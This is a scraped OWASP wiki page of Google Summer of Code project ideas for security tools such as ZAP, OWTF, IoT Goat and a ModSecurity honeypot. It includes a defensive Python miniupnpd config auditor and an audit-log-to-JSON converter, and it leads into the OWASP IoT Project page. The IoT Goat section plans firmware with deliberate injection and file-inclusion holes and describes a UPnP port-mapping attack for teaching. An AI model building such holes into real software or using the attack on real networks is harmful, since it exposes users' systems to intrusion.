===Roadmap=== <br />
See our roadmap: https://github.com/OWASP/SecureTea-Project#roadmap<br />
<br />
===Expected Results===<br />
<br />
* SecureTea Protection / firewall<br />
* SecureTea Antivirus<br />
* Notify by WhatsApp<br />
* Notify by SMS alerts<br />
* Notify by Line<br />
* Notify by Telegram<br />
* Intelligent log monitoring, including web defacement detection<br />
* Detection of malicious devices<br />
* Login history<br />
=== Students Requirements ===<br />
<br />
* Python<br />
* Javascript <br />
* Angular and NodeJS/Express<br />
* Database<br />
* Linux<br />
<br />
=== Mentors === <br />
<br />
* [mailto:ade.putra@owasp.org Ade Yoseman Putra] - (OWASP Securetea Project Leader)<br />
* [mailto:rejah.rehim@owasp.org Rejah Rehim.A.A] - (OWASP Securetea Project Leader)<br />
<br />
==OWASP OWTF==<br />
'''[https://github.com/owtf/owtf Offensive Web Testing Framework (OWTF)]''' is a project focused on penetration testing efficiency and alignment of security tests to security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST. Most of the ideas below focus on rewriting some major components of OWTF to make it more modular. OWTF is moving to a fresh codebase with a fully Dockerized testing and deployment environment. If you want to get a jumpstart, check out https://github.com/owtf/owtf/tree/new-arch.<br />
===OWASP OWTF - MiTM proxy interception and replay capabilities===<br />
'''Brief Explanation:'''<br />
<br />
The OWTF man-in-the-middle proxy is written completely in Python (based on the excellent Tornado framework) and was benchmarked to be the fastest MiTM Python proxy. However, it lacks the useful and much needed interception and replay capabilities of mitmproxy (https://github.com/mitmproxy/mitmproxy).<br />
<br />
The current implementation of the MiTM proxy serves its purpose very well. It's fast, but it's not extensible. There are a number of good use cases for being extensible:<br />
*ability to intercept the transactions<br />
*modify or replay transaction on the fly<br />
*add additional capabilities to the proxy (such as session marking/changing) without polluting the main proxy code<br />
Bonus:<br />
*Design and implement a proxy plugin (middleware) architecture so that the plugins can be defined separately and the user can choose what plugins to include dynamically (from the web interface).<br />
*Replace the current Requester (based on urllib, urllib2) with a more robust Requester based on the new urllib3 with support for a real headless browser factory. The typical flow when an authenticated browser instance is requested (using PhantomJS):<br />
*The "Requester" module checks if any login parameters are provided (i.e. form-based or script; look at https://github.com/owtf/login-sessions-plugin)<br />
*Create a browser instance and do the necessary login procedure<br />
*Handle the browser for the URI<br />
*When called to close the browser, do a clean logout and kill the browser instance.<br />
'''Expected results:'''<br />
*'''IMPORTANT: [http://legacy.python.org/dev/peps/pep-0008/ PEP-8 compliant code] in all modified code and surrounding areas.'''<br />
*'''IMPORTANT: [https://github.com/7a/owtf/wiki/Contributor%27s-README OWTF contributor README compliant code]'''<br />
*'''IMPORTANT: [http://sphinx-doc.org/ Sphinx-friendly python comments] [http://owtf.github.io/ptp/_modules/ptp/tools/w3af/parser.html#W3AFXMLParser example Sphinx-friendly python comments here]'''<br />
*CRITICAL: Excellent reliability<br />
*Good performance<br />
*Unit tests / Functional tests<br />
*Good documentation<br />
'''Knowledge Prerequisite:''' Python proficiency, some previous exposure to security concepts and penetration testing is welcome but not strictly necessary as long as there is will to learn.<br />
<br />
'''OWASP OWTF Mentors:''' Contact: [mailto:Abraham.Aranguren@owasp.org Abraham Aranguren], [mailto:viyat.bhalodia@owasp.org Viyat Bhalodia], [mailto:bharadwaj.machiraju@gmail.com Bharadwaj Machiraju] - OWASP OWTF Project Leaders<br />
===OWASP OWTF - Web interface enhancements===<br />
'''Brief explanation:'''<br />
<br />
The current web interface is a mixture of Tornado Jinja templates and ReactJS. A complete UI change to a stable ReactJS-based interface should be the deliverable for this project. Most of the hard part for the change has already been done and added in a separate branch at https://github.com/owtf/owtf/tree/develop.<br />
<br />
For background on OWASP OWTF please see: https://www.owasp.org/index.php/OWASP_OWTF<br />
<br />
'''Expected results:'''<br />
*'''IMPORTANT: Clean, maintainable (ES6 compatible and using recommended design patterns) React (JavaScript) code. ([https://github.com/getsentry/zeus/tree/master/webapp This] is a good example!)'''<br />
*'''IMPORTANT: Thoroughly documented code along with API examples and example future components.'''<br />
*'''CRITICAL''': Excellent reliability and performance.<br />
*Unit tests / Functional tests and easy to setup testing environment (preferably automated).<br />
'''Knowledge Prerequisite:''' Python (reading API source code and endpoints), React.JS (high proficiency) and general JavaScript proficiency.<br />
<br />
'''OWASP OWTF Mentors:''' Contact: [mailto:Abraham.Aranguren@owasp.org Abraham Aranguren], [mailto:viyat.bhalodia@owasp.org Viyat Bhalodia], [mailto:bharadwaj.machiraju@gmail.com Bharadwaj Machiraju] - OWASP OWTF Project Leaders<br />
===OWASP OWTF - New plugin architecture===<br />
'''Brief explanation:'''<br />
<br />
The current plugin system is not very useful and it is painful to browse the many plugins. Most of the plugins contain a lot of code, and most of it is repeated; much refactoring is needed there.<br />
<br />
This issue is documented in detail at https://github.com/owtf/owtf/issues/905.<br />
<br />
For background on OWASP OWTF please see: https://www.owasp.org/index.php/OWASP_OWTF<br />
<br />
'''Expected results:'''<br />
*'''IMPORTANT: [http://legacy.python.org/dev/peps/pep-0008/ PEP-8 compliant code] in all modified code and surrounding areas.'''<br />
*'''IMPORTANT: [https://github.com/7a/owtf/wiki/Contributor%27s-README OWTF contributor README compliant code]'''<br />
*'''IMPORTANT: [http://sphinx-doc.org/ Sphinx-friendly python comments] [http://owtf.github.io/ptp/_modules/ptp/tools/w3af/parser.html#W3AFXMLParser example Sphinx-friendly python comments here]'''<br />
*CRITICAL: Excellent reliability<br />
*Good performance<br />
*Unit tests / Functional tests<br />
*Good documentation<br />
<br />
== OWASP iGoat (draft) ==<br />
'''Idea 1:''' Completing the OWASP iGoat documentation at https://docs.igoatapp.com/ and creating demo videos for the OWASP iGoat YouTube channel for learning purposes.<br />
<br />
'''Idea 2:''' Adding a new challenge pack / CTF for iGoat. It should be a single point of reference for learning iOS app security.<br />
<br />
== OWASP Seraphimdroid ==<br />
[[OWASP SeraphimDroid Project|OWASP Seraphimdroid]] is an Android security and privacy app, with features to enhance the user's knowledge about security and privacy on his/her mobile device. If you are interested in this project and in working on it during Google Summer of Code, please contact [[User:Nikola Milosevic|Nikola Milosevic]] and express your interest.<br />
<br />
=== Idea 1: Anomaly detection of device state ===<br />
The idea is that certain features of a device would be constantly monitored (battery use, internet usage, opp calls, etc.). Initially, the usual behaviour of the device would be learned. Later, anomalies from normal behaviour would be reported to the user. This should involve some explanation, such as which applications are causing the anomaly in the device's behaviour.<br />
<br />
=== Idea 2: On device machine learning of maliciousness of an app ===<br />
TensorFlow for on-device processing and some other libraries have been released that enable on-device machine learning. We have previously applied a system that, based on permissions, is able to distinguish malicious apps from non-malicious ones. Now we would like to also learn from other outputs and things one can monitor about an application whether it may be malicious.<br />
<br />
=== Idea 3: Enhancing privacy features ===<br />
The vision of Seraphimdroid is to be aware of privacy threats. This may be achieved through knowing which applications are using user accounts or other information that the user has on the phone to send to a server, or just by knowing which applications may be doing it. The knowledge base should be extended with suggestions on how to improve privacy. Also, automated settings for various apps to use encryption should be proposed.<br />
==OWASP ZAP==<br />
[[OWASP Zed Attack Proxy Project|The OWASP Zed Attack Proxy]] (ZAP) is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers. Previous GSoC students have implemented key parts of the ZAP core functionality and have been offered (and accepted) jobs based on their work on ZAP.<br />
<br />
=== Active Scanning WebSockets ===<br />
: '''Brief Explanation:'''<br />
: ZAP has good support for websockets, and allows them to be intercepted, changed and fuzzed. Unfortunately it doesn't currently support active scanning (automated attacking) of websocket traffic (messages).<br />
: We would like to add active scanning support to websockets, ideally in a generic way which would allow us to reuse as many of our existing rules as are relevant. Adding additional websocket specific attacks would also be very useful.<br />
: This project will be a continuation of the work that was started as part of last year's GSoC.<br />
: '''Expected Results:'''<br />
:* A pluggable infrastructure that allows us to active scan websockets<br />
:* Converting the relevant existing scan rules to work with websockets<br />
:* Implementing new websocket specific scan rules<br />
: '''Getting Started:''' <br />
:* Have a look at the ZAP [https://github.com/zaproxy/zaproxy/blob/develop/CONTRIBUTING.md CONTRIBUTING.md] file, especially the 'Coding' section.<br />
:* We like to see students who have already contributed to ZAP, so try fixing one of the bugs flagged as [https://github.com/zaproxy/zaproxy/issues?q=is%3Aopen+is%3Aissue+label%3AIdealFirstBug IdealFirstBug].<br />
: '''Knowledge Prerequisites:'''<br />
:* ZAP is written in Java, so a good knowledge of this language is recommended. Some knowledge of application security would be useful, but not essential.<br />
: '''Mentors:''' [https://www.owasp.org/index.php/User:Psiinon Simon Bennetts] [mailto:psiinon@gmail.com @] and the rest of the ZAP Core Team<br />
<br />
=== Automated Authentication Detection and Configuration ===<br />
: '''Brief Explanation:'''<br />
: Currently a user must manually configure ZAP to handle authentication, e.g. as per <nowiki>https://github.com/zaproxy/zaproxy/wiki/FAQformauth</nowiki><br />
: This is time consuming and error prone.<br />
: Ideally ZAP would help detect login and registration pages and provide more assistance when configuring authentication, ideally being able to completely automate the task for as many sorts of webapps as possible.<br />
: This project will be a continuation of the work that was started as part of last year's GSoC.<br />
: '''Expected Results:'''<br />
:* Detect login and registration pages<br />
:* Provide a wizard to walk users through the process of setting up authentication, with as much assistance as possible<br />
:* An option to completely automate the authentication process, for as many authentication mechanisms as possible<br />
: '''Getting Started:''' <br />
:* Have a look at the ZAP [https://github.com/zaproxy/zaproxy/blob/develop/CONTRIBUTING.md CONTRIBUTING.md] file, especially the 'Coding' section.<br />
:* We like to see students who have already contributed to ZAP, so try fixing one of the bugs flagged as [https://github.com/zaproxy/zaproxy/issues?q=is%3Aopen+is%3Aissue+label%3AIdealFirstBug IdealFirstBug].<br />
: '''Knowledge Prerequisites:'''<br />
:* ZAP is written in Java, so a good knowledge of this language is recommended. Some knowledge of application security would be useful, but not essential.<br />
: '''Mentors:''' [https://www.owasp.org/index.php/User:Psiinon Simon Bennetts] [mailto:psiinon@gmail.com @] and the rest of the ZAP Core Team<br />
<br />
== IoT Goat ==<br />
IoT Goat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf IoT Top 10 2018]. <br />
<br />
===Idea 1: Insecure firmware web application ecosystem===<br />
'''Brief Explanation:'''<br />
<br />
A vulnerable web application, and backend API/web services deployed in OpenWrt containing critical vulnerabilities showcasing the traditional IoT problems.<br />
<br />
''' Getting started '''<br />
* Have a look at the getting started page to get familiar with virtualizing OpenWrt: https://github.com/scriptingxss/IoTGoat#-getting-started-<br />
* Create a GitHub account to be added as a collaborator to the repository<br />
* Review the example vulnerabilities and challenges: https://github.com/scriptingxss/IoTGoat/blob/master/challenges/challenges.md<br />
<br />
'''Expected Results:'''<br />
<br />
Development of a simple web application user interface with web services and APIs deployed locally on the OpenWrt firmware. Documented challenges on how to discover and remediate web software security vulnerabilities. The insecure web application services must contain the following vulnerabilities to be used with the IoT testing guide:<br />
* Command injection<br />
* SQL injection<br />
* Local file inclusion <br />
* XXE injection<br />
* Insufficient authentication<br />
* Transfer sensitive data using insecure channels<br />
* Store sensitive data insecurely<br />
Vulnerable SOAP web services and REST API implementations are in-scope. <br />
<br />
'''Knowledge Prerequisites:'''<br />
* Working Linux knowledge<br />
* Embedded and/or web development (nice to have)<br />
** Web application code can be developed using the following common embedded programming languages:<br />
*** Lua<br />
*** PHP<br />
*** C/C++<br />
*** JavaScript<br />
<br />
===Idea 2: Insecure network services===<br />
'''Brief Explanation:'''<br />
<br />
Deliberately insecure services configured within OpenWrt, such as a miniupnpd daemon configured with secure_mode off (in secure mode a client can only redirect an incoming port to the client itself, i.e. the same IP the request comes from), to demonstrate a port-mapping attack in which an attacker inside the network exposes a service that should typically stay behind the LAN to the internet.<br />
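From the defender's side, the setting above is something a firmware review can check mechanically. The following is an added example (not IoT Goat project code) that audits a miniupnpd configuration for secure_mode; it assumes the native miniupnpd.conf `secure_mode=yes|no` key and the OpenWrt UCI `option secure_mode '1'|'0'` form, and all sample configs in it are constructed.<br />

```python
"""Audit an OpenWrt miniupnpd configuration for the secure_mode weakness.

Added example, not code from the IoT Goat project. It understands the two
config syntaxes found on OpenWrt: the daemon's native miniupnpd.conf
(key=value) and the UCI file /etc/config/upnpd (option key 'value'). All
sample configurations below are constructed for illustration.
"""
import re
from typing import Dict, List

# Constructed sample: the weak setting the challenge is built around
WEAK_MINIUPNPD_CONF = """\
# constructed miniupnpd.conf fragment
ext_ifname=eth0.2
listening_ip=br-lan
enable_natpmp=yes
enable_upnp=yes
secure_mode=no
"""

# Constructed sample: the hardened counterpart of the file above
HARDENED_MINIUPNPD_CONF = """\
# constructed miniupnpd.conf fragment
ext_ifname=eth0.2
listening_ip=br-lan
enable_natpmp=yes
enable_upnp=yes
secure_mode=yes
"""

# Constructed sample in OpenWrt UCI syntax with secure_mode disabled
WEAK_UCI_UPNPD = """\
config upnpd 'config'
	option enable_natpmp '1'
	option enable_upnp '1'
	option secure_mode '0'
	option external_iface 'wan'
	option internal_iface 'lan'
"""

TRUE_VALUES = {"yes", "1", "true", "on"}
FALSE_VALUES = {"no", "0", "false", "off"}

# UCI: "option <name> '<value>'" (quotes optional); native: "<name>=<value>"
_UCI_OPTION = re.compile(r"^\s*option\s+(\w+)\s+'?([^']*?)'?\s*$")
_NATIVE_KV = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.*?)\s*$")


def parse_config(text: str) -> Dict[str, str]:
    """Return lower-cased key/value pairs from either config syntax.

    '#' comments and blank lines are ignored, UCI 'config' headers and 'list'
    entries are skipped, and a repeated key keeps its last value.
    """
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0]          # strip comments
        if not line.strip():
            continue
        match = _UCI_OPTION.match(line) or _NATIVE_KV.match(line)
        if match:
            settings[match.group(1).lower()] = match.group(2).strip().lower()
    return settings


def audit_upnpd(text: str) -> List[str]:
    """Return findings for the config text; an empty list means nothing flagged.

    With secure_mode off, a client on the LAN can ask the daemon to forward an
    external port to a *different* internal host, which is the exposure the
    challenge demonstrates.
    """
    cfg = parse_config(text)
    findings: List[str] = []
    if cfg.get("enable_upnp") in FALSE_VALUES:
        return findings                       # UPnP IGD port mapping not offered
    secure = cfg.get("secure_mode")
    if secure is None:
        findings.append("secure_mode not set explicitly; confirm the daemon default")
    elif secure in FALSE_VALUES:
        findings.append("secure_mode off: LAN clients may map external ports "
                        "to other hosts' addresses")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak miniupnpd.conf", WEAK_MINIUPNPD_CONF),
                        ("hardened miniupnpd.conf", HARDENED_MINIUPNPD_CONF),
                        ("weak /etc/config/upnpd", WEAK_UCI_UPNPD)):
        issues = audit_upnpd(conf)
        print(f"{label}: {'OK' if not issues else '; '.join(issues)}")
```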
<br />
''' Getting started '''<br />
* Have a look at the getting started page to get familiar with virtualizing OpenWrt: https://github.com/scriptingxss/IoTGoat#-getting-started-<br />
* Create a GitHub account to be added as a collaborator to the repository<br />
* Review the example vulnerabilities and challenges: https://github.com/scriptingxss/IoTGoat/blob/master/challenges/challenges.md<br />
<br />
'''Expected Results:'''<br />
<br />
Documented challenges of how to discover and remediate insecure network service vulnerabilities. The network services can be inherently insecure or have insecure configurations that can be abused during the challenges.<br />
* Examples of insecure network services include:<br />
** FTP<br />
** Telnet<br />
** miniupnpd<br />
** HTTP<br />
'''Knowledge Prerequisites:'''<br />
* Working Linux knowledge<br />
* Network security<br />
<br />
===Idea 3: Insecure firmware build system===<br />
'''Brief Explanation:'''<br />
<br />
Develop custom firmware builds of the latest OpenWrt version (18.06) demonstrating the process of incorporating debug services/tools, misconfigurations, and usage of vulnerable software packages. <br />
<br />
''' Getting started '''<br />
* Review OpenWrt's developer guide to get familiar with creating custom firmware builds<br />
** https://openwrt.org/docs/guide-developer/start<br />
** https://openwrt.org/docs/guide-developer/build-system/install-buildsystem<br />
** https://github.com/openwrt/openwrt<br />
<br />
'''Expected Results:'''<br />
* Provide walkthrough examples of insecure design choices for building firmware. <br />
* Provide suggested mitigation security controls<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Working Linux knowledge<br />
* Embedded development (C/C++)<br />
<br />
===Suggest your own ideas===<br />
You may suggest additional challenges or ideas that fit this project's objectives.<br />
<br />
=== Mentors and Leaders ===<br />
* Aaron Guzman - OWASP IoT Goat Contributor (Project leader of the IoT and Embedded AppSec project)<br />
* Fotios Chantzis - OWASP IoT Goat Contributor (and former GSoC Student/GSoC Mentor)<br />
* [[User:Calderpwn|Paulino Calderon]] - OWASP IoT Goat Contributor (and former GSoC 2011 Student/GSoC Mentor in 2015 and 2017)<br />
<br />
==OWASP Web Honeypot Project ==<br />
<br />
The goal of the OWASP Honeypot Project is to identify emerging attacks against web applications and report them to the community, in order to facilitate protection against such targeted attacks. Within this project, Anglia Ruskin University is leading the collection, storage and analysis of threat intelligence data. <br />
<br />
https://www.owasp.org/index.php/OWASP_Honeypot_Project<br />
<br />
https://github.com/OWASP/Honeypot-Project/<br />
<br />
<br />
===Brief Explanation===<br />
The purpose of this part of the project is to capture intelligence on attacker activity against web applications and use this intelligence to protect software against attacks. Honeypots are an established industry technique: they provide a realistic target to entice a criminal, whilst encouraging them to divulge the tools and techniques they use during an attack. Like bees to a honeypot. These honeypots are designed to contain no information of monetary use to an attacker, and hence pose no risk to the businesses implementing them. <br><br />
<br />
The project will create honeypots that the community can distribute within their own networks. With enough honeypots globally distributed, we will be in a position to aggregate attack techniques to better understand and protect against the techniques used by attackers. With this information, we will be in a position to create educational information, such as rules and strategies, that application writers can use to ensure that any detected bugs and vulnerabilities are closed. <br><br />
<br />
===Idea===<br />
Project progression: <br />
* Honeypot software. The honeypot software that is to be provided to the community to place in their networks has been written. Honeypots are available in a variety of forms, to make deployment as flexible as possible and appeal to as diverse a user set as possible.<br />
* Collection software. The centralised collection software has been written and evaluated in a student driven proof-of-concept project. Honeypots have been attacked in a laboratory situation and have reported both the steps taken by the attacker and what they have attacked, back to the collection software.<br />
* Rollout to the Community. The project now needs a dedicated infrastructure platform in place that is available to the entire community to start collecting intelligence back from community deployed honeypots. This infrastructure will run the collector software, analysis programmes and provide a portal for communicating our finds and recommendations back to the community in a meaningful manner.<br />
* Going Forward. Toolkits and skills used by attackers do not stand still. As existing bugs are plugged, others open. Follow up stages for the project will be to create a messaging system to automatically update the community on findings of significant risk in their existing code that requires attention. <br />
<br />
<br />
=== Expected Results ===<br />
<br />
Some of the ideas from last year's summit<br />
<br />
* Set up a proof of concept to understand how a ModSecurity based honeypot/probe interacts with a receiving console (develop a VM and/or Docker based test solution to store logs from multiple probes).<br />
* Evaluate console options to visualise threat data received from ModSecurity honeypots/probes: ModSecurity Audit Console, WAF-FLE, Fluent and bespoke scripts, for single and multiple probes.<br />
* Develop a mechanism to convert stored MySQL data to JSON format.<br />
* Provide a mechanism to convert ModSecurity mlogc audit log output into JSON format.<br />
* Provide a mechanism to convert mlogc audit log output directly into ELK (ElasticSearch/Logstash/Kibana) to visualise the data.<br />
* Provide a mechanism to forward honeypot output into a threat intelligence format such as STIX, using something like the [https://www.misp-project.org MISP project] to share threat data coming from the honeypots and make it easy to export/import data in formats such as STIX and TAXII; this may require the use of concurrent logs in a format that MISP can deal with.<br />
* Consider new alternatives for log transfer, including the use of MLOGC-NG or other possible approaches.<br />
* Develop a new VM based honeypot/probe based on CRS v3.0.<br />
* Develop new alternative small footprint honeypot/probe formats utilising Docker & Raspberry Pi.<br />
* Develop a machine learning approach to automatically update the rule set used by the probe based on the cyber threat intelligence received.<br />
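As an added example for the "mlogc audit log output into JSON" and "directly into ELK" items above (example code, not OWASP Honeypot Project, ModSecurity or mlogc code): a parser for ModSecurity's serial audit log format, the part-delimited layout that mlogc ships one transaction at a time, turning each entry into a JSON document an ELK or MISP import pipeline could consume. The audit entry embedded in the block is constructed: the addresses are RFC 5737 documentation ranges, and the rule id, message text, file path and version strings are placeholders rather than real CRS values.<br />

```python
"""Convert ModSecurity serial audit log entries (the per-transaction files
mlogc ships) into JSON documents.

Added example for the honeypot "audit log to JSON" ideas; not OWASP Honeypot
Project, ModSecurity or mlogc code.  The entry below is constructed: RFC 5737
addresses, and a placeholder rule id, message, file path and version strings.
"""
import json
import re
from typing import Any, Dict, Iterator, List, Tuple

SAMPLE_AUDIT_ENTRY = """\
--7f1c2b9a-A--
[10/Mar/2019:12:34:56 +0000] XIUQf8CoAQEAAAB3AAAAAA 203.0.113.10 51234 192.0.2.5 80
--7f1c2b9a-B--
GET /wp-login.php HTTP/1.1
Host: honeypot.example
User-Agent: Mozilla/5.0 (constructed sample)
--7f1c2b9a-F--
HTTP/1.1 403 Forbidden
Content-Length: 0
--7f1c2b9a-H--
Message: Warning. Matched phrase "constructed" at REQUEST_HEADERS:User-Agent. [file "/etc/crs/PLACEHOLDER-RULE-FILE.conf"] [line "60"] [id "000000"] [msg "Constructed sample message"] [severity "CRITICAL"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"]
Producer: ModSecurity for Apache/x.y.z (http://www.modsecurity.org/); OWASP_CRS/3.0.x.
--7f1c2b9a-Z--
"""

# Part boundary: --<boundary>-<letter>--  (A header, B/C request, E/F response, H trailer, Z end)
_BOUNDARY_RE = re.compile(r"^--([0-9A-Za-z]+)-([A-Z])--$", re.MULTILINE)
# Part A: [timestamp] unique_id source_ip source_port destination_ip destination_port
_PART_A_RE = re.compile(
    r"^\[(?P<time>[^\]]+)\] (?P<id>\S+) (?P<src_ip>\S+) (?P<src_port>\d+) "
    r"(?P<dst_ip>\S+) (?P<dst_port>\d+)\s*$"
)
# Bracketed fields appended to Message lines: [id "..."] [msg "..."] [tag "..."]
_TAG_RE = re.compile(r'\[(\w+) "((?:[^"\\]|\\.)*)"\]')


def iter_entries(log_text: str) -> Iterator[str]:
    """Yield each transaction of a serial log; every entry starts at its part A."""
    starts = [m.start() for m in _BOUNDARY_RE.finditer(log_text) if m.group(2) == "A"]
    for i, start in enumerate(starts):
        yield log_text[start:starts[i + 1] if i + 1 < len(starts) else len(log_text)]


def split_parts(entry: str) -> Dict[str, str]:
    """Map part letter -> raw text of that part for one entry."""
    marks = list(_BOUNDARY_RE.finditer(entry))
    parts: Dict[str, str] = {}
    for i, m in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(entry)
        parts[m.group(2)] = entry[m.end():end].strip("\n")
    return parts


def parse_http_part(block: str) -> Tuple[str, Dict[str, str]]:
    """First line is the request or status line; the rest are `Name: value` headers."""
    lines = block.splitlines()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return (lines[0] if lines else ""), headers


def parse_trailer(block: str) -> Tuple[List[Dict[str, Any]], Dict[str, str]]:
    """Part H: each `Message:` becomes a dict of its bracketed fields; other lines are kept."""
    messages: List[Dict[str, Any]] = []
    other: Dict[str, str] = {}
    for line in block.splitlines():
        name, sep, value = line.partition(":")
        if not sep:
            continue
        name, value = name.strip(), value.strip()
        if name != "Message":
            other[name] = value
            continue
        msg: Dict[str, Any] = {"text": value.split(" [", 1)[0]}
        for key, val in _TAG_RE.findall(value):
            if key == "tag":  # repeated, so collect into a list
                msg.setdefault("tags", []).append(val)
            else:
                msg[key] = val
        messages.append(msg)
    return messages, other


def audit_entry_to_dict(entry: str) -> Dict[str, Any]:
    """Build the JSON-ready document for one transaction."""
    parts = split_parts(entry)
    header = _PART_A_RE.match(parts.get("A", ""))
    if header is None:
        raise ValueError("missing or malformed audit log part A")
    tx: Dict[str, Any] = header.groupdict()
    tx["src_port"], tx["dst_port"] = int(tx["src_port"]), int(tx["dst_port"])
    req_line, req_headers = parse_http_part(parts.get("B", ""))
    resp_line, resp_headers = parse_http_part(parts.get("F", ""))
    messages, trailer = parse_trailer(parts.get("H", ""))
    return {
        "transaction": tx,
        "request": {"line": req_line, "headers": req_headers, "body": parts.get("C", "")},
        "response": {"line": resp_line, "headers": resp_headers},
        "messages": messages,
        "trailer": trailer,
    }


def to_json(entry: str) -> str:
    return json.dumps(audit_entry_to_dict(entry), indent=2)
```

Each document keeps the rule id, severity and tags of every Message line as separate fields, which is what a Kibana dashboard or a MISP attribute mapping needs to pivot on; the raw request and response parts are kept alongside so a later analysis pass can still see the full transaction.<br />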
<br />
<br />
=== Student Requirements ===<br />
<br />
Some of the skills we are looking for:<br />
<br />
* Apache/Tomcat <br />
* Any experience of MISP<br />
* MySQL & JSON<br />
* ELK <br />
* STIX/TAXII<br />
* Python<br />
* ModSecurity/mlogc<br />
* OWASP Core RuleSet (CRS)<br />
* Linux<br />
* VM/Docker<br />
<br />
=== Mentors === <br />
<br />
* [mailto:adrian.winckles@owasp.org Adrian Winckles] - (OWASP Web Honeypot Project Leader) <br><br />
<br />
===Suggest your own ideas===<br />
<br />
You may suggest additional challenges or ideas that fit this project's objectives.<br />
<br />
==OWASP Risk Assessment Framework ==<br />
This tool project aims to assess one or many web applications using the OWASP Risk Rating Methodology.<br />
https://github.com/OWASP/RiskAssessmentFramework<br />
<br />
'''Idea 1:''' build a dashboard backed by a database that can assess many websites using the OWASP Risk Rating Methodology, and produce graphs and reports in PDF, Word and Excel formats.<br />
=== Mentors === <br />
* [mailto:ade.putra@owasp.org Ade Yoseman] - <br></div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=248644OWASP Internet of Things Project2019-03-12T03:24:07Z<p>Aaron.guzman: /* ICS/SCADA Project */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT, including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants, whether you're a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
